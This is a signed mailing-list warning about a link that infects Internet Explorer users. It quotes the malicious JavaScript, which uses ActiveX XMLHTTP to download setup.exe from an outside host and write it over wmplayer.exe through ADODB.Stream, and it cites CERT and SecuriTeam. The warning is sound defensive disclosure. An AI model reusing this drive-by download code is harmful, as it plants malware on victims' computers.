-----BEGIN PGP SIGNED MESSAGE-----
> Flaw is available here: http://www24.brinkster.com ...
please be careful following links to URLs and browsing.
the URL posted recently tries to infect Microsoft Internet Explorer
users using exploit code in a pop-up window like this:
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://moguay.clawz.com/setup.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
etc.
more info from cert:
http://www.kb.cert.org/vuls/id/320516
more details on the exact exploit:
http://www.securiteam.com/windowsntfocus/6H0052A8KW.html
why are you still using Internet Explorer? and why are
you following untrusted links?
jay w.
[EMAIL PROTECTED]
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.0.4
iQEVAwUBP5aMcsyM0YPqVE7FAQFLqgf/bxt9Ln+VITGvM7B+BXJvqeq4m6o/4FtV
Un1vqKzVBJ3DFTNqzv6MFtAow9FioGACyvH/QLBgsMN4JLr7y9DCBMk9miQxXa20
ajiUrRiAv9+G8shz+8ALdIdOvD1wo/CpM1KZELSca3nk19quxVniGmvJMmNYUJRs
m8ps9vp3lQ1xTTxJo3jDuhnJAExQrxMiqevFqRIRQx7vd8ZS0hsHqV50HbwfDTy1
TNbT0b2amHL7kMJ8ZCrfAoJkUloUnUiYHfkW+rjpgKeRw47NQWxjWP85rnOTWAgN
pktMljAqVDoU8T/C7djCYGCnjHiYa//U673OILhQ0mgkuglNf35VBQ==
=kjlP
-----END PGP SIGNATURE-----
---
You are currently subscribed to e-gold-list as: [EMAIL PROTECTED]
To unsubscribe send a blank email to [EMAIL PROTECTED]
Use e-gold's Secure Randomized Keyboard (SRK) when accessing your e-gold account(s)
via the web and shopping cart interfaces to help thwart keystroke loggers and common
viruses.
